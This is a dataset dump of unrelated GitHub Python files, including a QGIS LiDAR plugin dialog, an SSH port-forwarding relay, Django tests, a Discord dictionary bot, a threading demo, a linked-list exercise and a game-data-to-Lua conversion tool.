dirs_list = glob.glob(key_for_glob)\r\n indexes = []\r\n for directory in dirs_list:\r\n try:\r\n fn_index = int(directory[-3:])\r\n except ValueError:\r\n try:\r\n fn_index = int(directory[-2:])\r\n except ValueError:\r\n fn_index = int(directory[-1])\r\n indexes.append(fn_index)\r\n max_index = max(indexes)\r\n next_index = max_index + 1\r\n out_path = os.path.join(outPath,\r\n (base_name + '_r' + str(next_index)))\r\n\r\n self.dir_fns = dir_fns.DirAndPaths(filename, out_path)\r\n\r\n 
self.showMessage(u'Starting processing LiDAR data {}'.format(base_name),\r\n Qgis.MessageLevel(0))\r\n\r\n try:\r\n self.process = plugin_process.Process(full_filename,\r\n out_path,\r\n self.pixel_size,\r\n self.inter_method,\r\n self.partials_create_load)\r\n\r\n except (ValueError, OSError) as message:\r\n self.showQMessage(str(message))\r\n self.showMessage('LiDAR Forestry Height stopped process',\r\n Qgis.MessageLevel(1))\r\n return\r\n\r\n if self.partials_create_load:\r\n self.load_raster_layer(self.process.dirs.out_paths['dtm'])\r\n self.load_raster_layer(self.process.dirs.out_paths['dsm'])\r\n\r\n if self.load_result:\r\n self.load_raster_layer(self.process.dirs.out_paths['height'])\r\n\r\n def load_raster_layer(self, raster_full_path):\r\n \"\"\"Add the result to canvas.\r\n \"\"\"\r\n raster_filename, _ = os.path.splitext(os.path.split(raster_full_path)[-1])\r\n rlayer = QgsRasterLayer(raster_full_path,\r\n raster_filename)\r\n QgsProject.instance().addMapLayer(rlayer)\r\n\r\n def showMessage(self, message, msg_level):\r\n \"\"\"This function shows a QGIS message bar when is called with the\r\n message and the message Level -i.e.:INFO-\r\n \"\"\"\r\n QgsMessageBar().pushMessage(\r\n message, level=msg_level)\r\n\r\n def showQMessage(self, message, msg_level = \"Error message\"):\r\n \"\"\"This function shows a Qt message dialog when is called with the\r\n message and the message Level-\r\n \"\"\"\r\n QtWidgets.QMessageBox.warning(self, msg_level, message)\r\n","repo_name":"PANOimagen/LiDARForestryHeight","sub_path":"LiDARForestryHeight_dialog.py","file_name":"LiDARForestryHeight_dialog.py","file_ext":"py","file_size_in_byte":9692,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"32"}
+{"seq_id":"41455835479","text":"import os\n\nimport synapse.dyndeps as s_dyndeps\nimport synapse.lib.socket as s_socket\n\nfrom synapse.links.common import *\n\nparamiko = s_dyndeps.getDynMod('paramiko')\n\nclass SshRelay(LinkRelay):\n '''\n Implements the SSH link protocol for synapse.\n\n ssh://[user[:passwd]@][:port]/?forward=[&keyfile=]\n\n '''\n proto = 'ssh'\n\n def _reqValidLink(self):\n\n if paramiko is None:\n raise Exception('paramiko module not installed')\n\n if self.link[1].get('port') is None:\n self.link[1]['port'] = 22\n\n host = self.link[1].get('host')\n if host is None:\n raise s_common.PropNotFound('host')\n\n fwdstr = self.link[1].get('forward')\n if fwdstr is None:\n raise s_common.PropNotFound('forward=')\n\n keyfile = self.link[1].get('keyfile')\n if keyfile is not None and not os.path.isfile(keyfile):\n raise Exception('keyfile not found: %s' % (keyfile,))\n\n fwdhost, fwdport = fwdstr.split(':')\n try:\n fwdport = int(fwdport, 0)\n except ValueError as e:\n raise Exception('Bad Forward Port: %r' % (fwdport,))\n\n self.link[1]['fwdhost'] = fwdhost\n self.link[1]['fwdport'] = fwdport\n\n def _listen(self):\n raise Exception('Synapse Link: SSH Listen Not Supported (yet)')\n\n def _connect(self):\n\n host = self.link[1].get('host')\n user = self.link[1].get('user')\n port = self.link[1].get('port')\n passwd = self.link[1].get('passwd')\n keyfile = self.link[1].get('keyfile')\n timeout = self.link[1].get('timeout')\n\n try:\n\n ssh = paramiko.client.SSHClient()\n ssh.load_system_host_keys()\n\n ssh.connect(host, port=port, username=user, password=passwd, key_filename=keyfile, timeout=timeout, allow_agent=True)\n\n trns = ssh.get_transport()\n\n fwdhost = self.link[1].get('fwdhost')\n fwdport = self.link[1].get('fwdport')\n\n s = trns.open_channel('direct-tcpip', (fwdhost, fwdport), ('127.0.0.1', 0))\n\n return s_socket.Socket(s, ssh=ssh)\n\n except s_common.sockerrs as e:\n raiseSockError(self.link, e)\n\n except Exception as e:\n ssh.close()\n raise\n","repo_name":"larrycameron80/synapse","sub_path":"synapse/links/ssh.py","file_name":"ssh.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"}
+{"seq_id":"34277393028","text":"from django.test import TestCase,Client\r\nimport packing\r\nimport json\r\n# from login import func\r\n\r\n# Create your tests here.\r\nclass func_testcase(TestCase):\r\n def setUp(self):\r\n packing.loaddata()\r\n self.appname = 'conf'\r\n self.tablename = 'ConfExaminationItem'\r\n self.c = Client()\r\n\r\n def test_func_impl_loadattrs(self):\r\n # packing.loaddata()\r\n\r\n c = self.c\r\n # appname = 'conf'\r\n # tablename = 'ConfExaminationItem'\r\n\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename}\r\n response = c.post('/impl/loadattrs',data=data)\r\n\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadattrs',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_loadall(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename}\r\n response = c.post('/impl/loadall',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadall',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_loadfilter(self):\r\n # packing.loaddata()\r\n c = self.c\r\n\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'condition':json.dumps({\r\n 'id':1\r\n }),\r\n }\r\n response = c.post('/impl/loadfilter',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadfilter',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_cmpl_loadfilter(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {\r\n 'tablelist':json.dumps(['conf.ConfExaminationItem', 'conf.ConfExaminationPlot']),\r\n 'condition':json.dumps({'id':2})\r\n }\r\n response = c.post('/cmpl/loadfilter',data=data)\r\n self.assertEqual(response.status_code, 200)\r\n # print ('test func cmpl loadfilter: ', str(response.content, encoding='utf-8'))\r\n\r\n def test_func_impl_loadone(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'itemid':1}\r\n response = c.post('/impl/loadone',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_loadone',str(response.content,encoding='utf-8'))\r\n\r\n def test_func_impl_saveobj(self):\r\n # packing.loaddata()\r\n c = self.c\r\n data = {\r\n 'appname':self.appname,\r\n 'tablename':self.tablename,\r\n 'obj':json.dumps({\r\n 'item_name':'test_item_name',\r\n 'item_type':'工作考核',\r\n 'score_total':10000.0,\r\n 'score_default':0,\r\n 'score_top_limit':10000.0,\r\n 'score_bottom_limit':0,\r\n 'item_count_limit':0,\r\n }),\r\n }\r\n response = c.post('/impl/saveobj',data=data)\r\n self.assertEqual(response.status_code,200)\r\n # print ('test_func_impl_saveobj',str(response.content,encoding='utf-8'))\r\n\r\n\r\n\r\n\r\nfrom login import func\r\nclass func_load_test(TestCase):\r\n def setUp(self):\r\n pass\r\n def test_func_impl_loadmodels(self):\r\n data = {\r\n 'appname':'conf',\r\n }\r\n\r\n res = func.loadtables(**data)\r\n self.assertListEqual(res, ['ConfExaminationItem', 'ConfExaminationPlot'])\r\n\r\n\r\n","repo_name":"MrLi008/py_django_implement","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2712750021","text":"#including required modules to the program\r\nimport os\r\nimport requests\r\nimport json\r\nimport discord\r\nimport datetime\r\n\r\nfrom dotenv import load_dotenv\r\n\r\nload_dotenv()\r\nTOKEN = os.getenv('DISCORD_TOKEN')\r\n\r\nclient = discord.Client()\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f'{client.user.name} has connected to Discord!')\r\n\r\n\r\n@client.event\r\nasync def on_member_join(member):\r\n await member.create_dm()\r\n await member.dm_channel.send(f'Hi {member.name}, welcome to my Discord server!')\r\n\r\n\r\n@client.event\r\nasync def on_message(message):\r\n if message.author == client.user:\r\n return\r\n\r\n msg = message.content\r\n\r\n if msg == '$help':\r\n embedv = discord.Embed(title='Dicti\\'s walkthrough', \r\n color=0xFF5733,\r\n timestamp=datetime.datetime.utcnow())\r\n\r\n embedv.set_thumbnail(url = 'https://i.imgur.com/emVAdxH.jpg')\r\n\r\n embedv.add_field(name = '`$help`',\r\n value = 'Displays the list of commands supported by Dicti and the specific syntax need for the usage',\r\n inline = False)\r\n\r\n embedv.add_field(name = '`$dict `',\r\n value = 'Displays information on the word used involving parameters such as definitions, synonyms, phonetics, etc.',\r\n inline = False)\r\n\r\n embedv.add_field(name = '`$urban `',\r\n value = 'Displays information regarding the colloquial use of the word and the its different meanings under different contexts',\r\n inline = False)\r\n\r\n await message.channel.send(embed = embedv)\r\n\r\n # if msg.startswith('$urban'):\r\n # word = msg.split('$urban ', 1)[1]\r\n\r\n # response = requests.get(\"https://api.urbandictionary.com/v0/define?term=\" + word)\r\n # json_data = json.loads(response.text)\r\n\r\n # deflist = json_data['list']\r\n # n = len(deflist)\r\n\r\n # if n > 0:\r\n # deflist = sorted(deflist, key = lambda x: x['thumbs_up'], reverse = True)\r\n # n = min(5, n)\r\n\r\n # page = []\r\n\r\n\r\n\r\n\r\n\r\n \r\n # else:\r\n # noword = 'No meanings found'\r\n # await message.channel.send(noword)\r\n\r\n if msg.startswith('$dict'):\r\n word = msg.split('$dict ', 1)[1]\r\n\r\n response = requests.get(\"https://api.dictionaryapi.dev/api/v2/entries/en/\" + word)\r\n json_data = json.loads(response.text)\r\n\r\n if type(json_data) == list:\r\n n = len(json_data)\r\n\r\n page = []\r\n \r\n for i in range(n):\r\n embedv = discord.Embed(title = 'Dictionary ('+str(i+1)+'/'+str(n)+')', \r\n description = json_data[i]['word'].title(), \r\n color=0xFF5733,\r\n timestamp=datetime.datetime.utcnow()) \r\n\r\n embedv.add_field(name = '\\u200b', \r\n value = '**Origin: **'+json_data[i]['origin'] +'\\n' + '**Parts of Speech: **'+json_data[i]['meanings'][0]['partOfSpeech'],\r\n inline = False)\r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False)\r\n\r\n embedv.add_field(name = 'Phonetics',\r\n value = 'Text: '+json_data[i]['phonetics'][0]['text'] + '\\n' + 'Audio: '+json_data[i]['phonetics'][0]['audio'],\r\n inline = False)\r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False)\r\n\r\n defs = json_data[i]['meanings'][0]['definitions']\r\n\r\n for j in range(len(defs)):\r\n x = len(defs[j]['synonyms'])\r\n y = len(defs[j]['antonyms'])\r\n\r\n if x > 0 and y > 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Synonyms: ' + str(defs[j]['synonyms'][:min(x,5)]) + '\\n' + 'Antonyms: ' + str(defs[j]['antonyms'][:min(y,5)]), \r\n inline = False) \r\n elif x > 0 and y == 
0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Synonyms: ' + str(defs[j]['synonyms'][:min(x,5)]), \r\n inline = False) \r\n elif x == 0 and y > 0:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'] + '\\n' + 'Antonyms: ' + str(defs[j]['antonyms'][:min(y,5)]), \r\n inline = False) \r\n else:\r\n embedv.add_field(name = 'Definition '+str(j+1),\r\n value = defs[j]['definition'], \r\n inline = False) \r\n\r\n embedv.add_field(name = '\\u200b',\r\n value = '\\u200b', \r\n inline = False) \r\n\r\n page.append(embedv)\r\n \r\n emb = await message.channel.send(embed = page[0])\r\n await emb.add_reaction(\"◀️\")\r\n await emb.add_reaction(\"▶️\")\r\n\r\n def check(reaction, user):\r\n return user == message.author\r\n\r\n k = 0 \r\n reaction = None\r\n\r\n while True:\r\n if str(reaction) == '◀️':\r\n if k > 0:\r\n k -= 1\r\n await emb.edit(embed = page[k])\r\n elif str(reaction) == '▶️':\r\n if k < n-1:\r\n k += 1\r\n await emb.edit(embed = page[k])\r\n\r\n try:\r\n reaction, user = await client.wait_for('reaction_add', timeout = 30.0, check = check)\r\n await emb.remove_reaction(reaction, user)\r\n except:\r\n break\r\n \r\n else:\r\n noword = json_data['title']\r\n await message.channel.send(noword)\r\n\r\nclient.run(TOKEN)","repo_name":"MistaAsh/Dicti-bot","sub_path":"dicti.py","file_name":"dicti.py","file_ext":"py","file_size_in_byte":5945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"781394489","text":"from threading import Thread\r\nfrom random import choice\r\nimport time\r\n\r\nauthor = 'Jencent Dizon'\r\nlink = 'https://github.com/I-am-Programmer-101'\r\nprint(\"Author:\",author,\"\\nLink:\",link)\r\n\r\ndata = [90,81,78,95,79,72,85]\r\n\r\nclass MyThread(Thread):\r\n \r\n def __init__(self, val):\r\n # Costructor\r\n Thread.__init__(self)\r\n self.val = val\r\n \r\n \r\n def run(self):\r\n for i in range(1):\r\n time.sleep(2)\r\n print('Average Value:',choice(data),'in %s' % (self.getName()))\r\n print('Maximum Value:',choice(data),'in %s' % (self.getName()))\r\n print('Minimum Value:',choice(data),'in %s' % (self.getName()))\r\n\r\n \r\n \r\n# Run following code when the program starts\r\nif __name__ == '__main__':\r\n print('Thread Starting...')\r\n # Declare objects of MyThread class\r\n myThreadOb1 = MyThread(3)\r\n myThreadOb1.setName('Thread 1')\r\n \r\n myThreadOb2 = MyThread(3)\r\n myThreadOb2.setName('Thread 2')\r\n\r\n myThreadOb3 = MyThread(3)\r\n myThreadOb3.setName('Thread 3')\r\n \r\n # Start running the threads!\r\n myThreadOb1.start()\r\n myThreadOb2.start()\r\n myThreadOb3.start()\r\n\r\n # Wait for the threads to finish...\r\n myThreadOb1.join()\r\n myThreadOb2.join()\r\n myThreadOb3.join()\r\n\r\n print('Thread Terminating...')\r\n","repo_name":"jencent101/Threading","sub_path":"threading.py","file_name":"threading.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"}
+{"seq_id":"2307143748","text":"#User function Template for python3\n\n'''\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n'''\n\ndef reverseDLL(head):\n if not head or not head.next :\n return head\n prev = None\n cur = head\n while cur :\n tmp = cur.next\n cur.next = prev\n cur.prev = tmp\n prev = cur\n cur = tmp\n return prev\n\n\n\n# Driver code Starts\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\nclass DoublyLinkedList:\n def __init__(self):\n self.head = None\n\n def push(self, new_data,tail):\n if not self.head:\n self.head=Node(new_data)\n return self.head\n Nnode=Node(new_data)\n Nnode.prev=tail\n tail.next=Nnode\n return Nnode\n\n def printList(self, node):\n while(node is not None):\n print (node.data,end=' ')\n node = node.next\n\n\n\nif __name__ == '__main__':\n t=int(input())\n\n for tcs in range(t):\n n=int(input())\n arr=[int(x) for x in input().split()]\n\n\n dll=DoublyLinkedList()\n tail=None\n\n for e in arr:\n tail=dll.push(e,tail)\n\n resHead=reverseDLL(dll.head)\n dll.printList(resHead)\n print()\n\n# Driver Code Ends\n","repo_name":"VbhvGupta/workspace","sub_path":"GFG/ReverseDLL.py","file_name":"ReverseDLL.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24202807630","text":"# -*- coding: utf-8 -*-\r\nclass LanguageObject(object):\r\n \r\n lang= None\r\n langDefault = None\r\n def __init__(self):\r\n pass\r\n \r\n @classmethod\r\n def setLanguage(cls,lang):\r\n \r\n cls.lang = []\r\n cls.langDefault = {}\r\n for l in lang:\r\n language = Language(id_language_label= l.id_language_label,\r\n module= l.module,\r\n default_label= l.default_label,\r\n message_en= l.message_en,\r\n message_th= l.message_th\r\n )\r\n cls.lang.append( language)\r\n cls.langDefault[l.default_label] = language\r\n \r\n @classmethod\r\n def getLanguage(cls):\r\n return cls.lang\r\n \r\n @classmethod\r\n def getdata(cls,key,lang='EN'):\r\n if (cls.langDefault is not None and cls.langDefault[key] is not None) :\r\n if 'th'.upper() == lang.upper():\r\n return cls.langDefault[key].message_th\r\n else:\r\n return cls.langDefault[key].message_en\r\n return key\r\n \r\n\r\nclass Language(object):\r\n def __init__(self,id_language_label=None,module=None,default_label=None,message_en=None, message_th=None):\r\n self.id_language_label = id_language_label\r\n self.module = module\r\n self.default_label = default_label\r\n self.message_en = message_en\r\n self.message_th = message_th","repo_name":"tongpa/JMProject","sub_path":"PyPollModel/surveyobject/languageobject.py","file_name":"languageobject.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"43077900185","text":"#-*-encoding:utf8-*-\n#!/bin/python\n\nimport os\nimport hashlib\nimport yaml\nimport zipfile\nimport time\nimport sys, getopt\n#import oss_util\nfrom jinja2 import *\nimport datetime\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\nimport dbutil\nimport shutil\n\ndef tableToClass(fieldName):\n strs = fieldName.split('_')\n result = ''\n for str in strs:\n result = result + str.capitalize()\n return result\n\ndef columnNameToFieldName(columnName):\n strs = columnName.split('_')\n result = ''\n index = 1\n for str in strs:\n if index == 1:\n result = result + str[0].lower() + str[1:]\n else:\n result = result + str.capitalize()\n index = index + 1\n return result\n\nclass Loader( BaseLoader ):\n def __init__(self, parent):\n self.env = Environment( loader=FileSystemLoader(parent))\n self.env.template_class = Template\n self.env.globals['tableToClass'] = tableToClass\n self.env.globals['columnNameToFieldName'] = columnNameToFieldName\n\n'''\nsdata数据转换为lua\n'''\nclass sdatatolua:\n '''\n 构造函数\n '''\n def __init__(self, config):\n self.game = config['game']\n self.sdataZipPath = config['sdata_zip_path']\n self.sdataVersion = config['sdata_version']\n self.confFilePath = config['config_file_path']\n self.env = config['env']\n self.mode = config['mode']\n\n self.log(\"env:%s\", self.env)\n self.log(\"game:%s\", self.game)\n self.log(\"sdataZipPath:%s\", self.sdataZipPath)\n self.log(\"sdataVersion:%s\", self.sdataVersion)\n\n self.loadConfig()\n\n if self.mode == 'db':\n self.dbutil = dbutil.DBUtil(host=self.dbConf['host'], db=self.dbConf['db'], user=self.dbConf['user'], passwd=self.dbConf['password'])\n\n # oss客户端\n # self.oss = oss_util.oss_util(access_key_id=self.ossConf['access_key_id'],\n # access_key_secret=self.ossConf['access_key_secret'],\n # bucket_name=self.ossConf['bucket_name'],\n # endpoint=self.ossConf['endpoint'])\n '''\n 载入配置\n '''\n def loadConfig(self):\n filepath = os.path.join(self.confFilePath, \"sdata.yml\")\n f = open(filepath, 'rb')\n # self.conf = yaml.load(f.read(), Loader=yaml.FullLoader)\n self.conf = yaml.load(f.read())\n f.close()\n\n sdataBaseDir=self.conf['output_dir']\n try:\n sdataBaseDir = sdataBaseDir%self.env\n except:\n pass\n\n self.sdataDir = os.path.join(sdataBaseDir, self.game)\n self.ossConf = self.conf['oss']\n self.tablesConf = self.conf['tables']\n self.dbConf = self.conf['db']\n\n '''\n 将Sdata转换为Lua\n '''\n def doSdataToLua(self):\n # 1. 检查工作空间\n self.doEnvCheck()\n\n # 2. 解压资源\n self.unzipSdataZip()\n\n # 3. 生成动更\n self.genSdataToLua()\n\n # 4. 
清理\n self.doClean()\n\n\n '''\n 环境检查\n '''\n def doEnvCheck(self):\n if not os.path.exists(self.sdataDir):\n self.log(\"第一次生成SdataToLua,创建目录:%s\", self.sdataDir)\n os.makedirs(self.sdataDir)\n self.log(\"sdataDir:%s\", self.sdataDir)\n\n # 目标路径\n self.newVersionDir = os.path.join(self.sdataDir, self.sdataVersion)\n if not os.path.exists(self.newVersionDir):\n os.makedirs(self.newVersionDir)\n self.log(\"sdataVersionDir:%s\", self.newVersionDir)\n\n\n '''\n 解压资源zip\n '''\n def unzipSdataZip(self):\n if self.mode == 'db':\n return\n\n if not os.path.exists(self.sdataZipPath):\n self.log(\"资源文件不存在, path:%s\", self.sdataZipPath)\n sys.exit(2)\n return\n\n # 解压文件\n dynamicZipFile = zipfile.ZipFile(self.sdataZipPath, 'r')\n count = 0\n start = time.time()\n totalCount = dynamicZipFile.namelist().__len__()\n for file in dynamicZipFile.namelist():\n end = time.time()\n if end - start > 1:\n start = time.time()\n self.log(\"资源包解压中:%s/%s\", count, totalCount)\n count += 1\n if file.endswith(\".xml\"):\n self.sdataXmlFile = os.path.join(self.newVersionDir, file)\n\n dynamicZipFile.extract(file, self.newVersionDir)\n self.log(\"资源包解压中:%s/%s\", count, totalCount)\n\n dynamicZipFile.close()\n\n # 检查版本号\n version = self.loadVersionTxt(os.path.join(self.newVersionDir, 'version.txt'))\n\n if (version != self.sdataVersion):\n self.log(\"错误的打包静态库版本号:%s, 输入版本号:%s\", version, self.sdataVersion)\n sys.exit(2)\n\n self.log(\"sdataXmlFile:%s\", self.sdataXmlFile)\n\n\n '''\n 生产sdataLua文件\n '''\n def genSdataToLua(self):\n if self.mode == 'db':\n self.genSdataToLuaByDB()\n else:\n self.genSdataToLuaByXML()\n\n '''\n 生产sdataLua文件(db)\n '''\n def genSdataToLuaByDB(self):\n # 读取xml文件\n self.log(\"genSdataToLua\")\n\n tablesMap = {}\n filePath = os.path.join(self.newVersionDir, 'SdataData.lua')\n f = open(filePath, 'wb')\n results = self.dbutil.query(\"show tables\")\n for tableName in results:\n name = tableName['Tables_in_%s'%self.dbConf['db']]\n # 查看配置文件是否需要处理\n if not self.tablesConf.has_key(name):\n continue\n\n tableResults = self.dbutil.query(\"select * from %s\"%name)\n datas = []\n rowKeys = self.tablesConf[name]['rowKey']\n for row in tableResults:\n dataMap = {}\n for key, value in row.iteritems():\n dataMap[str(key)] = self.getValue(value)\n\n dataMap['rowData'] = ''\n for rowKey in rowKeys.split(\",\"):\n if dataMap['rowData'] != '':\n dataMap['rowData'] = dataMap['rowData'] + \"-\" + dataMap[rowKey]\n else:\n dataMap['rowData'] = dataMap[rowKey]\n datas.append(dataMap)\n\n tableMap = {}\n tableMap['datas'] = datas\n tableMap['fields'] = self.tablesConf[name]['fields']\n tablesMap[name] = tableMap\n\n # 载入模板环境\n env = Loader(self.confFilePath).env\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # 生成domain文件\n self.log(\"configFilePath:%s\", self.confFilePath)\n template = env.get_template(\"sdatatolua.template\", parent=self.confFilePath)\n result = template.render(tables=tablesMap, time=now, sdataVersion=self.sdataVersion)\n\n contentMD5 = self.md5(result.encode(\"utf-8\"))\n\n f.write(result.encode('utf8'))\n f.write('sdata.time = \"%s\"\\n'%now)\n f.write('sdata.version = \"%s\"\\n'%self.sdataVersion)\n f.write('sdata.md5 = \"%s\"'%contentMD5)\n f.flush()\n\n\n fileMD5 = self.md5file(filePath)\n self.log(\"contentMD5:%s\", contentMD5)\n self.log(\"fileMD5:%s\", fileMD5)\n self.log(\"filePath:%s\", os.path.abspath(filePath))\n\n # 生产zipFile\n fileList = []\n fileList.append('SdataData.lua')\n self.createZipFile(os.path.join(self.sdataDir, contentMD5+\".zip\"), fileList)\n\n '''\n 
生产sdataLua文件(XML)\n '''\n def genSdataToLuaByXML(self):\n # 读取xml文件\n self.log(\"genSdataToLua\")\n domTree = ET.ElementTree(file=self.sdataXmlFile)\n root = domTree.getroot()\n\n filePath = os.path.join(self.newVersionDir, 'SdataData.lua')\n f = open(filePath, 'wb')\n tablesMap = {}\n for child in domTree.iter(tag='table'):\n table = child\n name = table.attrib[\"name\"]\n\n # 查看配置文件是否需要处理\n if not self.tablesConf.has_key(name):\n continue\n\n datas = []\n for row in table:\n dataMap = {}\n for field in row:\n key = field.attrib[\"name\"]\n value = field.text\n dataMap[key] = value\n datas.append(dataMap)\n\n tableMap = {}\n tableMap['datas'] = datas\n tableMap['rowKey'] = self.tablesConf[name]['rowKey']\n tableMap['fields'] = self.tablesConf[name]['fields']\n tablesMap[name] = tableMap\n\n # 载入模板环境\n env = Loader().env\n now = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n\n # 生成domain文件\n template = env.get_template(\"sdatatolua.template\", self.confFilePath)\n result = template.render(tables=tablesMap, time=now, sdataVersion=self.sdataVersion)\n\n contentMD5 = self.md5(result.encode(\"utf-8\"))\n\n f.write(result.encode('utf8'))\n f.write('sdata.time = \"%s\"\\n'%now)\n f.write('sdata.version = \"%s\"\\n'%self.sdataVersion)\n f.write('sdata.md5 = \"%s\"'%contentMD5)\n f.flush()\n\n\n fileMD5 = self.md5file(filePath)\n self.log(\"contentMD5:%s\", contentMD5)\n self.log(\"fileMD5:%s\", fileMD5)\n\n '''\n 执行清理操作\n '''\n def doClean(self):\n try:\n shutil.rmtree(self.newVersionDir)\n except:\n pass\n\n '''\n 载入version.txt\n '''\n def loadVersionTxt(self, filepath):\n # 打开version.lua\n version = None\n resFile = open(filepath, 'rb')\n for line in resFile.readlines():\n if line == None or line.strip() == \"\":\n continue\n line = line.strip()\n version = line.strip()\n break\n\n resFile.close()\n\n return version\n\n '''\n 创建zipfile\n '''\n def createZipFile(self, zipFilePath, fileList):\n self.log(\"生成包:%s\", zipFilePath)\n zFile = zipfile.ZipFile(zipFilePath, 'w', compression=zipfile.ZIP_DEFLATED)\n\n for filename in fileList:\n filepath = os.path.join(self.newVersionDir, filename)\n zFile.write(filepath, filename)\n # self.log(\"pack zip file:%s, file:%s\", zipFilePath, filename)\n\n zFile.close()\n\n '''\n 拷贝文件\n '''\n def copyFile(self, filepath, filename):\n topath = os.path.join(self.out_dir, filename)\n self.execCmd(\"cp %s %s\", filepath, topath)\n\n '''\n 计算字符串md5\n '''\n def md5(self, content):\n m = hashlib.md5()\n m.update(content)\n\n return m.hexdigest()\n\n '''\n 计算文件md5\n '''\n def md5file(self, filepath):\n m = hashlib.md5()\n md5file = open(filepath, 'rb')\n m.update(md5file.read())\n md5file.close()\n\n return m.hexdigest()\n\n '''\n 执行系统命令\n '''\n def execCmd(self, cmd, *args):\n print(args)\n if args != None and len(args) > 0:\n cmd = cmd%args\n\n p = os.popen(cmd)\n self.log(\"exec cmd: %s end. 
rtn:%s\", cmd, p.read())\n\n '''\n 打印日志\n '''\n def log(self, fmt, *args):\n if args == None and len(args) == 0:\n return\n\n print(fmt%args)\n\n '''\n 获取值\n '''\n def doSQL(self, sql):\n return sql.replace('%s', '\\'' + '%s' + '\\'')\n \n '''\n 获取db值\n '''\n def getValue(self, value):\n valueTypeName = type(value).__name__\n rtn = None\n if valueTypeName != 'str' and valueTypeName != 'unicode':\n rtn = str(value)\n else:\n rtn = value\n\n if rtn.find('\"') != -1:\n rtn = rtn.replace('\"', '\\\\\"')\n return rtn\n\ndef main(argv):\n config = {\n \"game\": \"zjzr2\",\n \"sdata_zip_path\": \"C:\\\\Users\\\\wangys\\\\Downloads\\\\sdata.zip\",\n \"sdata_version\": \"0.0.0.0\",\n \"env\": \"dev\",\n \"mode\": \"db\",\n \"config_file_path\": \"tools\"\n }\n try:\n opts, args = getopt.getopt(argv, \"g:p:v:r:s:e:t:h:\", [\"game=\", \"path=\", \"version=\", \"region\", \"scope=\", \"env=\", \"tips=\", \"help=\"])\n except getopt.GetoptError:\n print('hotupdate -g -p -v -r -s -e [-t ]')\n sys.exit(2)\n\n for opt, arg in opts:\n if opt in (\"-g\", \"--game\"):\n config['game'] = arg\n elif opt in (\"-p\", \"--path\"):\n config['res_zip_path'] = arg\n elif opt in (\"-v\", \"--version\"):\n config['game_version'] = arg\n elif opt in (\"-r\", \"--region\"):\n config['region'] = arg\n elif opt in (\"-s\", \"--scope\"):\n config['scope'] = arg\n elif opt in (\"-e\", \"--env\"):\n config['env'] = arg\n elif opt in (\"-t\", \"--tips\"):\n config['update_tips'] = arg\n elif opt in (\"-h\", \"--help\"):\n print('hotupdate -g -p -v -r -s -e [-t ]')\n # /home/hario/hotupdate.sh --game ${option.game} --region ${option.region} --scope ${option.scope} --version ${option.version} --env ${option.env} --isBeta ${option.isBeta} --hides ${option.hides}\n # -g gmmx -p F:/hotupdate/gmmx_cn_9.9.9.9_android_20190527180239_191_static_dynamic.zip -v 9.9.9.9 -r cn_luajit32 -u android,ast -t tips\n\n p = sdatatolua(config)\n p.doSdataToLua()\n\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","repo_name":"qq4215279/study_python","sub_path":"py_study_2.7_test/sbtj_tools/sdatatolua.py","file_name":"sdatatolua.py","file_ext":"py","file_size_in_byte":13589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
